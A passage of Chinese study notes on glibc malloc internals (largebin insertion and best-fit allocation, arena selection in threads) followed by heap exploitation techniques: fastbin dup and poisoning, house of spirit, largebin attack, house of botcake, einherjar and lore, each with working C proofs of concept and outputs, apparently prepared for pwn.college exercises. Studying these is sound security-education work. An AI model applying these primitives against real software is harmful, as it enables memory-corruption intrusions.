	binmap[2] |= (1<<0)

也就是对于largebin来说,binmap[0]永远用不到

algorithm

largebin中的堆块,只能是来自于unsortedbin

如果某次malloc没有从tcache,fastbins,smallbins,中得到想要的堆块

此时需要遍历unsortedbin,整理其中的所有堆块,归类到smallbins或者largebins

//unsortedbin整理算法:

如果unsortedbin只有last_remainder并且他能满足分配需求
	那么从last_remainder头部切出需求,剩下的继续作为last_remainder,然后返回

否则 将unsorted上的这块先拿下来
	如果这块的大小正好等于需求
		如果tcache不满则先搬到tcache并记下tcache可以满足,continue, 在整理完所有unsortedbin之后再返回, 整理过程中如果tcache满了也会返回
		否则tcache满则直接返回
	否则
		如果这块在smallbin范围内就放到smallbin
		否则这块在largebin范围内就放到largebin

将unsortedbin堆块放到smallbins中时非常简单,因为smallbins中的堆块大小和桶子下标有严格的关系,根据堆块大小计算出下标,头插法一塞就完了

但是往largebin放时,一个bin里面可能会有不同大小的堆块,需要先通过跳表索引进行插入排序

插入更小的堆块

假设现在bin_at(M,63)中已经有0x421,0x411的跳表索引

又要将一个0x401的堆块放进去

插入已有索引的堆块

假设现在bin_at(M,63)中已经有0x421,0x411,0x401的跳表索引

又要将一个0x411的堆块放进去,那么过程将会是这样的:

0.计算得知0x411落在bin_at(M,63)范围

1.与bin_at(M,63)->bk,也就是这个bin里最小的堆块,也就是一个0x401的堆块进行比较,发现新放入的堆块不是最小的,不能直接放到bin_at(M,63)->bk上,需要从大到小遍历这个bin,进行插入排序

2.从bin_at(M,63)->fd,有就是这个bin里最大的堆块,也就是与0x421开始比较,发现新放入的堆块比他小

3.利用0x421 上的跳表索引,找到了0x411的,新堆块可以放到这里了

4.保持跳表索引堆块不变,在其fd上插入新堆块

插入不存在索引的堆块

假设现在bin_at(M,63)中已经有0x421,0x401的跳表索引

又要将一个0x411的堆块放进去,那么过程将会是这样的:

当前bin中有堆块时拿走一个

largebin 在拿走堆块时采用最佳适配策略,也就是说尽量找一个最小的堆块满足分配需求

首先计算得到bin_at(M,idx)

然后通过fd链表找到该bin中最大的块

如果最大的块都无法满足需求,则使用largebin显然无法满足需求,没必要在largebin这里浪费时间了

否则本bin中必然存在能够满足需求的块,起码最大的块肯定可以,但是直接用这个最大块太亏,切割最大块之后造成外部碎片的可能性更大,因此接下来需要找到最佳适配的临界块

利用最大块的bk_nextsize索引跳到最小块上,然后再沿着bk_nextsize向更大块遍历,如此寻找最佳适配

找到最佳适配后,首先尝试拿走普通堆块,没有普通堆块再拿走索引堆块,

然后在这个堆块上切割出分配需求来,

如果剩余的下脚料太小了,小于0x20字节,就不抠搜了,整个普通节点全都返回,就当送人了

如果剩余的下脚料还行,大于等于0x20,那么就把下脚料扔给unsortedbin

当前bin中没有堆块时拿走一个

首先根据堆块大小计算出idx

发现idx对应的largebin中没有堆块

于是沿着idx++的方向,向更大的bin中寻找目标

这个寻找的过程使用了binmap加速

整个binmap分为四个block, 对应到四个int

根据当前bin的下标idx计算出所属的block

如果binmap[block] > idx2bit(idx)

这就说明idx所属的块中,可能存在更大的bin,其中有堆块

找到这个更大的bin,实际判断一下其中到底有没有堆块

从这个大bin中拿出一块切割,返回

切剩下的如果很小则一并返回了

否则放到unsortedbin

多线程场景

free

在通常情况下,堆区的申请和释放只会使用到主分配区main_arena,在多线程等情况下可能存在多个分配区,但是我们依然只管malloc和free,并没有指定从哪个分配区申请或者释放堆块

首先说释放:

实际上是libc_free决定了往哪里释放

void __libc_free(void *mem)
{
    mstate ar_ptr;
    mchunkptr p; /* chunk corresponding to mem */

    if (mem == 0) /* free(0) has no effect */
        return;

    ...

    p = mem2chunk(mem);
    //对于mmap申请的堆块,使用munmap倒回去
    if (chunk_is_mmapped(p)) /* release mmapped memory. */
    {
        ...
        munmap_chunk(p);
    }else{       //从分配区来的堆块,还给分配区
        MAYBE_INIT_TCACHE();

        /* Mark the chunk as belonging to the library again.  */
        (void)tag_region(chunk2mem(p), memsize(p));

        ar_ptr = arena_for_chunk(p);
        _int_free(ar_ptr, p, 0);
    }
    ...
}

在调用_int_free时传递了分配区指针ar_ptr,他是这样计算的:

1	ar_ptr = arena_for_chunk(p);

static inline struct malloc_state *
arena_for_chunk (mchunkptr ptr)
{
  return chunk_main_arena (ptr) ? &main_arena : heap_for_ptr (ptr)->ar_ptr;
}

这里chunk_main_arena(ptr)会检查堆块的A标志位,对于来自非主分配区的堆块,会调用heap_for_ptr计算其所在分配区

static inline heap_info *
heap_for_ptr (void *ptr)
{
  size_t max_size = heap_max_size ();
  return PTR_ALIGN_DOWN (ptr, max_size);
}

这干了个啥事呢?

max_size实际上是64M,然后ptr向下对齐到64M,是什么一个效果呢?

ptr & 0xfffffffffc000000

比如假设ptr = 0x555558026520

那么此时ptr & 0xfffffffffc000000 = 0x555558026520 & 0xfffffffffc000000 = 0x555558000000

这个值就被认为是ptr所在的分配区描述符heap_info的位置

type = struct _heap_info {
/* 0x0000      |  0x0008 */    mstate ar_ptr;
/* 0x0008      |  0x0008 */    struct _heap_info *prev;
/* 0x0010      |  0x0008 */    size_t size;
/* 0x0018      |  0x0008 */    size_t mprotect_size;
/* 0x0020      |  0x0008 */    size_t pagesize;
/* 0x0028      |  0x0008 */    char pad[8];

                               /* total size (bytes):   48 */
                             }

然后其中的ar_ptr就是分配区malloc_state指针

也就是说, 对于一个堆块p

如果其有标志位A,那么直接使用glibc中的main_arena指针返回主分配区

如果其无标志位A,那么首先将其地址向下对齐到64M得到heap_info的位置,然后得到ar_ptr的位置

malloc

如果只有一个线程显然不需要建立多个分配区,因为控制流同一时间只能有一个分配请求

那么对于多线程环境,首先如何界定多线程呢?

#ifndef __ASSEMBLER__
extern int __libc_multiple_threads;
libc_hidden_proto (__libc_multiple_threads)
#endif

#if !defined SINGLE_THREAD_BY_GLOBAL || IS_IN (rtld)
# define SINGLE_THREAD_P \
  (THREAD_GETMEM (THREAD_SELF, header.multiple_threads) == 0)
#else
# define SINGLE_THREAD_P (__libc_multiple_threads == 0)
#endif

#define RTLD_SINGLE_THREAD_P SINGLE_THREAD_P

#endif /* _SINGLE_THREAD_H  */

如果TCB中有定义multiple_threads字段,则检查该字段是否为1

否则检查glibc的__libc_multiple_threads变量是否为1

在x86上使用前者

这个多线程字段会指导malloc的行为

 if (SINGLE_THREAD_P)		//单线程时的行为
   {
     victim = tag_new_usable (_int_malloc (&main_arena, bytes));
     assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
      &main_arena == arena_for_chunk (mem2chunk (victim)));
     return victim;
   }
//下为多线程时行为
 arena_get (ar_ptr, bytes);	

 victim = _int_malloc (ar_ptr, bytes);
 /* Retry with another arena only if we were able to find a usable arena
    before.  */
 if (!victim && ar_ptr != NULL)
   {
     LIBC_PROBE (memory_malloc_retry, 1, bytes);
     ar_ptr = arena_get_retry (ar_ptr, bytes);
     victim = _int_malloc (ar_ptr, bytes);
   }

 if (ar_ptr != NULL)
   __libc_lock_unlock (ar_ptr->mutex);

 victim = tag_new_usable (victim);

在多线程场景下

首先尝试arena_get(ar_ptr = NULL,bytes)拿到一个分配区

#define arena_get(ptr, size) do { \
      ptr = thread_arena;						      \
      arena_lock (ptr, size);						      \
  } while (0)

#define arena_lock(ptr, size) do {					      \
      if (ptr)								      \
        __libc_lock_lock (ptr->mutex);					      \
      else								      \
        ptr = arena_get2 ((size), NULL);				      \
  } while (0)

主线程会有thread_arena = &main_arena

对于其他线程,第一次尝试分配时,thread_arena = NULL

此时会调用arena_get2,这个函数会尝试找一个当前空闲的分配区,如果有则返回

如果没有会尝试新创建一个分配区,如果已经达到了分配区数量上限,只能等着


static mstate
arena_get2 (size_t size, mstate avoid_arena)
{
  mstate a;

  static size_t narenas_limit;

  a = get_free_list ();	//尝试从freelist上拿一个分配区
  if (a == NULL)  //如果a == NULL说明当前没有空闲的分配区
    {
      /* Nothing immediately available, so generate a new arena.  */
      if (narenas_limit == 0)
        {
          if (mp_.arena_max != 0) //如果分配区数量有明确配置的上限
            narenas_limit = mp_.arena_max;
          else if (narenas > mp_.arena_test)//否则
            {
              int n = __get_nprocs_sched ();//获取能够使用的CPU核心数

              if (n >= 1)
                narenas_limit = NARENAS_FROM_NCORES (n);//在x86_64上最多是8*n
              else
                /* We have no information about the system.  Assume two
                   cores.  */
                narenas_limit = NARENAS_FROM_NCORES (2);
            }
        }
    repeat:;
      size_t n = narenas;
      /* NB: the following depends on the fact that (size_t)0 - 1 is a
         very large number and that the underflow is OK.  If arena_max
         is set the value of arena_test is irrelevant.  If arena_test
         is set but narenas is not yet larger or equal to arena_test
         narenas_limit is 0.  There is no possibility for narenas to
         be too big for the test to always fail since there is not
         enough address space to create that many arenas.  */
      if (__glibc_unlikely (n <= narenas_limit - 1))  //还能创建新的分配区
        {
          if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
            goto repeat;
          a = _int_new_arena (size);    //创建新分配区
	  if (__glibc_unlikely (a == NULL))
            catomic_decrement (&narenas);
        }
      else    //无法创建新分配区,此时只能轮询已有的分配区等待
        a = reused_arena (avoid_arena); 
    }
  return a;
}

这里freelist用于在多线程场景下,保存当前空闲的分配区

分配区malloc_state中有一个next_free就是单链表后继指针

/* offset      |    size */  type = struct malloc_state {
/* 0x0000      |  0x0004 */    __libc_lock_t mutex;
/* 0x0004      |  0x0004 */    int flags;
/* 0x0008      |  0x0004 */    int have_fastchunks;
/* XXX  4-byte hole      */
/* 0x0010      |  0x0050 */    mfastbinptr fastbinsY[10];
/* 0x0060      |  0x0008 */    mchunkptr top;
/* 0x0068      |  0x0008 */    mchunkptr last_remainder;
/* 0x0070      |  0x07f0 */    mchunkptr bins[254];
/* 0x0860      |  0x0010 */    unsigned int binmap[4];
/* 0x0870      |  0x0008 */    struct malloc_state *next;
/* 0x0878      |  0x0008 */    struct malloc_state *next_free;
/* 0x0880      |  0x0008 */    size_t attached_threads;
/* 0x0888      |  0x0008 */    size_t system_mem;
/* 0x0890      |  0x0008 */    size_t max_system_mem;

                               /* total size (bytes): 2200 */
                             }

如果freelist为空,说明当前没有空闲的分配区,但是哥们急着要用堆块,怎么办呢? 尝试创建一个新的分配区

但也不是一急就得立刻创建新分配区, 这个分配区有一个数量上限,8*核心数

如果能够创建,那么就调用_int_new_arena创建新分配区

这个函数会调用new_heap,继而调用alloc_new_heap函数创建一个heap_info结构

1	h = new_heap (size + (sizeof (h) + sizeof (a) + MALLOC_ALIGNMENT), mp_.top_pad);

1	heap_info *h = alloc_new_heap (size, top_pad, mp_.hp_pagesize, mp_.hp_flags);

1	p2 = (char *) MMAP (aligned_heap_area, max_size, PROT_NONE, mmap_flags);

实际上会调用mmap系统调用向操作系统要一大块空间

exploit

fastbins

double free dup

fastbins中对于二次释放的判断很唐氏

fastbins只会判断当前正在释放的堆块和挂在桶子头上的第一块是不是相同, 如果是就认为是Double Free了

如果fastbin上这样:

1	fastbin[idx] => A => B => NULL

此时释放B就可以绕过检查造成Double Free

1	fastbin[idx] => B => A => B => NULL

这又有个问题,使用malloc申请内存时

如果tcachebins中有东西,那么malloc会从tcache中拿,不会拿fastbins的

但是如果tcachebins中没东西,那么当从fastbins中拿一个之后,剩下的都会被放到tcachebins中

为了避免tcache抢东西,可以使用calloc

malloc => __libc_malloc	//此处首先尝试从tcache获取堆块
	_int_malloc			//此处尝试从斌家获取
	
calloc => __libc_malloc	//不使用tcache,直接调用_int_malloc
	_int_malloc			//此处尝试从斌家获取,但是如果tcache不满,还是会抢斌家的填满tcache

为了避免tcache造成影响,可以首先将tcache填满,目的是在斌家分配一次后,避免剩余的堆块进入tcache

然后使用calloc函数分配,目的是避免从tcache中取堆块

写个exp意思意思

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main(){

    printf("printf this time will establish a write buffer\n");
    size_t *tcache_chunks[7];
    size_t *A;
    size_t *B;
    size_t *C;
    // size_t *barrier;        
    A = malloc(0x40);
    B = malloc(0x40);
    for(int i=0;i<7;i++){       
        tcache_chunks[i] = malloc(0x40);
    }
    for(int i=0;i<7;i++){       //fill tcache
        free(tcache_chunks[i]);
    }

    free(B);                    //next free to fastbin
    free(A);
    free(B);
    //fastbins[idx] => B => A => B


    B = calloc(1,0x40);           //next malloc from fastbin
    A = calloc(1,0x40);
    C = calloc(1,0x40);

    printf("B: %p\n", B);
    printf("A: %p\n", A);
    printf("C: %p\n", C);
    assert(B == C);

    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins# make
gcc -w -g -o fastbin_dup fastbin_dup.c -o fastbin_dup
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins# ./fastbin_dup
printf this time will establish a write buffer
B: 0x55dd112b2700
A: 0x55dd112b26b0
C: 0x55dd112b2700

poison

利用Double Free,或者其他手段, 使得堆管理器持有某个堆块指针的同时, 我们也持有一个

此时我们利用这个指针进行Use After Free, 对该已经释放的堆块进行写入操作, 覆盖该堆块的元数据, 修改fd指针指向任意地址

写个poc意思意思

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

#define sz  0x40

typedef struct{
    size_t prev_size;
    size_t size;
    size_t* fd;
    size_t* bk;
}malloc_chunk;

malloc_chunk fake_chunk={
    .prev_size = 0,
    .size = (sz + 0x10) | 1,
    .fd = 0,
    .bk = 0
};

int main(){
    printf("printf this time will establish a write buffer\n");
    size_t * tcache_chunks[7];
    size_t * A;
    size_t * B;
    size_t * C;
    for(int i=0;i<7;i++){
        tcache_chunks[i] = (size_t*)malloc(sz);
    }
    A = (size_t*)malloc(sz);
    B = (size_t*)malloc(sz);

    for(int i=0;i<7;i++){           //fill tcache
        free(tcache_chunks[i]);
    }
    free(A);                        //free to fastbin
    free(B);
    free(A);
    //fastbins[idx] => A => B => A

    A = calloc(1,sz);
    B = calloc(1,sz);
    //fastbins[idx] => A

    size_t * fake_chunk_mem = (char*)&fake_chunk + 0x10;
    A[0] = ((size_t)A >> 12) ^ (size_t)&fake_chunk;
    //fastbins[idx] => A => fake_chunk


    printf("fake_chunk_mem = %p\n", fake_chunk_mem);
    printf("A = %p\n", A);
    A = calloc(1,sz);
    printf("A = %p\n", A);
    C = calloc(1,sz);
    printf("C = %p\n", C);
    assert(C == fake_chunk_mem);

    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# make
gcc -w -g -o fastbin_poison fastbin_poison.c -o fastbin_poison
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./fastbin_poison
printf this time will establish a write buffer
fake_chunk_mem = 0x55d7ebf53030
A = 0x55d7ed23d8e0
A = 0x55d7ed23d8e0
C = 0x55d7ebf53030

dup_with_consolidate

0.填充tcache

1.找一个与topchunk相邻的小堆块,free进入fastbins,==并继续持有其指针==

2.发起0x400字节的分配申请,导致malloc_consolidate,使得fastbins中的堆块合并到topchunk,然后本次申请拿到同一个指针,但是堆块大小变成了0x411(包括元数据,标志位和用户空间)

3.free小堆块的野指针,这实际上会导致大块被释放进入unsortedbin

4.再次发起0x400字节的分配申请,再次拿到同一个堆块

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main(){

    printf("this printf will establish the write buffer\n");
    size_t * tcache_chunks[7];
    size_t * A;
    size_t * B;
    size_t * C;
    for(int i=0;i<7;++i){
        tcache_chunks[i] = malloc(0x40);
    }
    A = malloc(0x40);           //malloc a chunk next to the topchunk

    for(int i=0;i<7;++i){
        free(tcache_chunks[i]); //fill the tcache
    }
    
    // A = calloc(1,0x40);
    printf("A:%p\n",A);
    free(A);                    //return A back to fastbins

    B = malloc(0x400);          //cause a malloc_consolidate , merge A with the topchunk , then malloc B with the same address of A
    printf("B:%p\n",B);
    assert(A == B);

    free(A);                    //double free A , then B will be free

    C = malloc(0x400);          //malloc C at the same address of B 
    printf("C:%p\n",C);
    assert(C == B);

    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./fastbin_dup_consolidate
this printf will establish the write buffer
A:0x563058c578e0
B:0x563058c578e0
C:0x563058c578e0

特点是不需要calloc

reverse_into_tcache

如果fastbin中有多于一个堆块,tcache空

那么从该fastbin中拿一个堆块时,首先会把tcache填满,然后再从tcache中拿出一个堆块来

并且fastbin和tcache都是链栈结构

这会导致fastbin中的堆块连接顺序反过来

1
2
3

fastbins[idx]->1->2->3->4->5->6->7

tcachebins[idx]->7->6->5->4->3->2->1

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>


int main(){ 
    size_t *tcache_chunks[7];
    size_t *fastbin_chunks[7];
    int usable_size = 0x10;
    int chunk_size = ( usable_size + 0x10 ) | 1;
    size_t fake_chunk[7];
    memset(fake_chunk,0x3c,sizeof(fake_chunk));
    size_t * victim;

    for(int i=0;i<7;++i){
        tcache_chunks[i] = malloc(usable_size);
    }
    for(int i=0;i<7;i++){
        fastbin_chunks[i] = malloc(usable_size);
    }
    for(int i=0;i<7;i++){
        free(tcache_chunks[i]);
    }
    for(int i=0;i<7;i++){
        free(fastbin_chunks[i]);
    }
    *fastbin_chunks[0] = ((size_t)fastbin_chunks[0] >> 12) ^ ((size_t)&fake_chunk);
    for(int i=0;i<7;i++){
        tcache_chunks[i] = malloc(usable_size);     //empty tcache
    }
    malloc(usable_size);            //reverse fastbin into tcache
    victim = malloc(usable_size);   //get stack address
    assert(victim == (size_t*)&fake_chunk[2]);
    return 0;
}

1
2

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc fastbin_reverse_into_tcache.c -o fastbin_reverse_into_tcache -w -g
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./fastbin_reverse_into_tcache

house_of_mind

不会

house_of_spirit

任意堆块释放进入fastbin

构造假堆块时需要注意物理上相邻的下一个堆块的prev_size字段

这里有一个检查

bool fail = true;
/* We might not have a lock at this point and concurrent modifications
   of system_mem might result in a false positive.  Redo the test after
   getting the lock.  */
if (!have_lock)
{
    __libc_lock_lock(av->mutex);
    fail = (chunksize_nomask(chunk_at_offset(p, size)) <= CHUNK_HDR_SZ || chunksize(chunk_at_offset(p, size)) >= av->system_mem);
    __libc_lock_unlock(av->mutex);
}

if (fail)
    malloc_printerr("free(): invalid next size (fast)");
}

通过检查的条件是:

1 2	1.nextchunk.prev_size > chunk_hdr_sz (0x10) 2.nextchunk.prev_size < av->system_mem (整个堆区的大小,可能是0x21000)

不需要和fake_chunk.size设置相同,只需要满足上述两个条件即可

写个poc意思意思

#include <stdio.h>
#include <assert.h>

int main(){
    size_t *victim;
    size_t *tcache_chunks[7];
    size_t fake_chunk[10];
    size_t *target;
    fake_chunk[0] = 0;  //prev_size
    fake_chunk[1] = 0x40;  //size
    fake_chunk[9] = 0x1145;  //绕过两个宽松的检查

    for(int i=0;i<7;i++){
        tcache_chunks[i] = malloc(0x30);
    }
    for(int i=0;i<7;i++){
        free(tcache_chunks[i]);
    }
    victim = (size_t *)&fake_chunk[2];
    free(victim);       //将堆栈上的假堆块释放进入fastbin
    for(int i=0;i<7;i++){   
        tcache_chunks[i] = malloc(0x30);//清空tcache保证下一次从fastbin中拿
    }

    target = malloc(0x30);  
    printf("victim: %p\n", victim); 
    printf("target: %p\n", target);
    assert(target == victim);
    
    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc house_of_spirit.c -o house_of_spirit -g -w
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./house_of_spirit
victim: 0x7ffe53fab090
target: 0x7ffe53fab090

largebins

任意合法地址写堆块地址

1.首先将0x431 释放进入largebin

2.假设此时我们有一个UAF ,修改0x431从堆块的bk_nextsize指针指向目标地址

3.将释放0x421释放进入largebin,此时由于0x421是该bin中最小的,因此0x421放入largebin中不会有任何检查

     victim_index = largebin_index (size);
     bck = bin_at (av, victim_index);
     fwd = bck->fd;
if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){
                 fwd = bck;
                 bck = bck->bk;

                 victim->fd_nextsize = fwd->fd;
                 victim->bk_nextsize = fwd->fd->bk_nextsize;
                 fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
               }
     mark_bin (av, victim_index);
     victim->bk = bck;
     victim->fd = fwd;
     fwd->bk = victim;
     bck->fd = victim;

其效果就是target->fd_nextsize = &chunk_0x421

0x431的fd_nextsize还是错误地指向自己,这是因为修改该指针的机会被用于修改target的fd_nextsize了

写个poc意思意思

#include <stdio.h>
#include <stdlib.h>
typedef struct {    //use struct to align automatically
    size_t prev_size;
    size_t size;
    size_t fd;
    size_t bk;
    size_t fd_nextsize;
    size_t bk_nextsize;
}Target;

Target target={
    .prev_size = 0,
    .size = 0,
    .fd = 0,
    .bk = 0,
    .fd_nextsize = 0,
    .bk_nextsize = 0
};
void print_target(){
    printf("----------------------------------------------\n");
    printf("prev_size: %p\n", target.prev_size);
    printf("size: %p\n", target.size);
    printf("fd: %p\n", target.fd);
    printf("bk: %p\n", target.bk);
    printf("fd_nextsize: %p\n", target.fd_nextsize);
    printf("bk_nextsize: %p\n", target.bk_nextsize);
    printf("----------------------------------------------\n");
}

int main(){
    setvbuf(stdin,NULL,_IONBF,0);
    setvbuf(stdout,NULL,_IONBF,0);
    setvbuf(stderr,NULL,_IONBF,0);   

    size_t *A;
    size_t *B;
    size_t *gap1;
    size_t *gap2;

    A = malloc(0x420);
    gap1 = malloc(0x10);
    B = malloc(0x410);
    gap2 = malloc(0x10);
    free(A);        //A first put into unsortedbin
    malloc(0x430);  //a larger malloc request cause A then put into largebin
    free(B);        //B first put into unsortedbin

    A[3] = &target;
    print_target();
    malloc(0x430);  //put B into the same largebin as A
    print_target();

    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc largebin_attack.c -o largebin_attack -w -g
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./largebin_attack
----------------------------------------------
prev_size: (nil)
size: (nil)
fd: (nil)
bk: (nil)
fd_nextsize: (nil)
bk_nextsize: (nil)
----------------------------------------------
----------------------------------------------
prev_size: (nil)
size: (nil)
fd: (nil)
bk: (nil)
fd_nextsize: 0x55ea6d16f6e0
bk_nextsize: (nil)
----------------------------------------------

同理可以将堆块地址写到堆栈上

unsortedbin

house_of_botcake

当释放的堆块没有被tcache接受(通常因为tcache满了),也没有被fastbin接受(通常比fastbin管辖范围大),

此时尝试对堆块尝试向前合并向后合并

如果向后临近topchunk则直接还给topchunk

如果向后不临近topchunk,则会放到unsortedbin中

else if (!chunk_is_mmapped(p))
{
    nextchunk = chunk_at_offset(p, size);

    nextsize = chunksize(nextchunk);
    free_perturb(chunk2mem(p), size - CHUNK_HDR_SZ);

    /* consolidate backward */
    if (!prev_inuse(p))
    {
        prevsize = prev_size(p);
        size += prevsize;
        p = chunk_at_offset(p, -((long)prevsize));
        if (__glibc_unlikely(chunksize(p) != prevsize))
            malloc_printerr("corrupted size vs. prev_size while consolidating");
        unlink_chunk(av, p);
    }

    if (nextchunk != av->top)
    {
        /* get and clear inuse bit */
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

        /* consolidate forward */
        if (!nextinuse)
        {
            unlink_chunk(av, nextchunk);
            size += nextsize;
        }
        else
            clear_inuse_bit_at_offset(nextchunk, 0);


        bck = unsorted_chunks(av);
        fwd = bck->fd;
        if (__glibc_unlikely(fwd->bk != bck))
            malloc_printerr("free(): corrupted unsorted chunks");
        p->fd = fwd;
        p->bk = bck;
        if (!in_smallbin_range(size))
        {
            p->fd_nextsize = NULL;
            p->bk_nextsize = NULL;
        }
        bck->fd = p;
        fwd->bk = p;

        set_head(p, size | PREV_INUSE);
        set_foot(p, size);

        check_free_chunk(av, p);
    }

    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */

    else
    {
        size += nextsize;
        set_head(p, size | PREV_INUSE);
        av->top = p;
        check_chunk(av, p);
    }

    ...

假设有两个堆块a和b在物理上相邻,a在低处,b在高处

先释放b进入unsortedbin,然后释放a,

此时a会向前合并到b

此时让tcachebin腾个空,Double Free a,让a进入tcachebins

为什么要让tcachebin腾空呢?直接free放到bins中不行吗?

还真不行,因为第一次free(a)进入unsortedbin时,会让a->nextchunk->prev_in_use置零,

下一次如果free(a)还是进入unsortedbin中时,会检查到a->nextchunk->prev_in_use=0,检查出了二次释放

而tcachebins只会有一个key值判重检查,显然释放进入bins中的堆块不会设置key值,能够通过这个检查

那么此时就形成了堆块重叠

a成为b腹中的一部分

写个poc意思意思

#include <stdio.h>
int main(){
    size_t *tcache_chunks[7];
    size_t *a;
    size_t *b;
    size_t *barrier;

    for(int i = 0;i<7;i++){
        tcache_chunks[i] = malloc(0x100);
    }
    a = malloc(0x100);
    b = malloc(0x100);  //b's address is higher than a's
    barrier = malloc(0x10); //prevent consolidation with topchunk
    for(int i=0;i<7;i++){
        free(tcache_chunks[i]); //fill tcache
    }
    free(b);//free b into unsortedbins
    free(a);//a will consolidate with b 
    tcache_chunks[0] = malloc(0x100); //make room for 
    free(b);
    malloc(b);
    b[0]=0x1122334455667788;
    printf("%p\n",a[0x110/sizeof(size_t)]);

    return 0;
}

1
2
3

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc house_of_botcake.c -o house_of_botcake -g -w
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./house_of_botcake
0x1122334455667788

house_of_einherjar

攻击假设:

0.能够控制tcache的状态

1.堆块申请时,复用下一堆块的prev_size字段,能够构造假的prev_size字段

并且存在off-by-one,能够再修改size的标志位中的prev_in_use

画个图意思意思

b最终被释放进入tcache之后,可以使用fake_chunk改写tcache的元数据进行投毒

写个poc意思意思

#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
int main(){
    size_t *tcache_chunks[7];
    size_t *a;
    size_t *b;
    size_t *c;
    size_t *barrier;
    size_t *target;
    size_t *fake_chunk_header;
    size_t *fake_chunk_mem;
    for(int i=0;i<7;i++){
        tcache_chunks[i] = malloc(0xf0);
    }
    a = malloc(0xf0);
    b = malloc(0x38);
    c = malloc(0xf0);
    barrier = malloc(0x10);
    for(int i=0;i<7;i++){
        free(tcache_chunks[i]);
    }
    fake_chunk_header = a;          //consruct a fake chunk inside chunk a's memory
    fake_chunk_header[0] = 0;
    fake_chunk_header[1] = 0x130;
    fake_chunk_header[2] = &fake_chunk_header[0];
    fake_chunk_header[3] = &fake_chunk_header[0];
    fake_chunk_mem = fake_chunk_header + 2;

    b[0x30/sizeof(size_t)] = 0x130;         //fake_c_prevsize
    char * size_ptr = &b[0x38/sizeof(size_t)]; 
    *size_ptr= 0;     //off by one
    free(c);

    target = malloc(0x220);
    printf("target: %p\n", target);
    printf("fake_chunk_mem: %p\n", fake_chunk_mem);
    assert(target == fake_chunk_mem);

    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc house_of_einherjar.c -o house_of_einherjar -g -w
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./house_of_einherjar
target: 0x5591c4d6f9b0
fake_chunk_mem: 0x5591c4d6f9b0

smallbins

house_of_lore

攻击假设:对释放进入smallbins中的堆块有UAF,能够修改其bk指针

1.释放一个堆块victim进入smallbins

2.对victim进行UAF,修改其bk指针指向a堆块

3.a前与victim相连,后与b相连

4.b后面只使用bk指针挂了一串堆块(能够填满tcahe)

5.清空tcache然后malloc,导致a,b以及一连串拖家带口进入tcache

6.此后从tcache中分配可以进行任意地址写

画个图意思意思

写个poc意思意思

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

typedef struct{
    size_t prev_size;
    size_t size;
    size_t *fd;
    size_t *bk;
}BinChunk;

int main(){

    size_t *tcache_chunks[7];
    size_t *victim;
    size_t *victim_header;
    size_t *barrier;
    BinChunk a;						//on stack
    BinChunk b;						//on stack
    BinChunk fake_freelist[7];		//on stack
    size_t * target;


    for(int i=0;i<6;i++){
        fake_freelist[i].bk = &fake_freelist[i+1];
    }       //fake_freelist[0] => fake_freelist[1] => fake_freelist[2] => ... fake_freelist[6]

    for(int i=0;i<7;i++){
        tcache_chunks[i] = malloc(0x100);
    }
    victim = malloc(0x100);
    printf("victim = %p\n",victim);
    victim_header = (char*)victim - 0x10;
    barrier = malloc(0x10);
    for(int i=0;i<7;i++){
        free(tcache_chunks[i]); //fill tcache
    }
    free(victim);           //now victim is in unsorted bin
    malloc(0x1000);         //sort victim into smallbin
    //suppose we have UAF to modify victim.bk points to a
///////////////////////////////////
    victim[1] = &a; //UAF
///////////////////////////////////

    a.fd = victim_header;
    a.bk = &b;
    b.fd = &a;
    b.bk = &fake_freelist[0];

    // smallbins[idx] => victim <=> a <=> b => fake_freelist[0] => fake_freelist[1] => ... fake_freelist[6]

    for(int i=0;i<7;i++){
        tcache_chunks[i] = malloc(0x100);   //empty tcache
    }

    victim = malloc(0x100); //get victim again and use smallbins to fill tcache
    //tcache[idx] => fake_freelist[4] => fake_freelist[3] => fake_freelist[2] => fake_freelist[1] => fake_freelist[0] =>b =>a

    target = malloc(0x100); //fetch fake_freelist[4] from tcache
    
    printf("victim = %p\n",victim);
    printf("target = %p\n",target);
    assert(target == &fake_freelist[4].fd);
    return 0;
}

root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# gcc house_of_lore.c -o house_of_lore -g -w
root@Destroyer:/mnt/c/Users/xidian/Desktop/pwncollege/bins/test# ./house_of_lore
victim = 0x563ada3d8a10
victim = 0x563ada3d8a10
target = 0x7ffd93539ed0

pwn.college

level1.0

攻击假设:

0.只有malloc,没有calloc

1.最多持有16个堆块指针,可以填充tcache

2.free之后不清空指针,可以UAF

可以考虑 fastbin_dup_with_consolidate的思路

0.填充tcache

1.找一个与topchunk相邻的小堆块,free进入fastbins

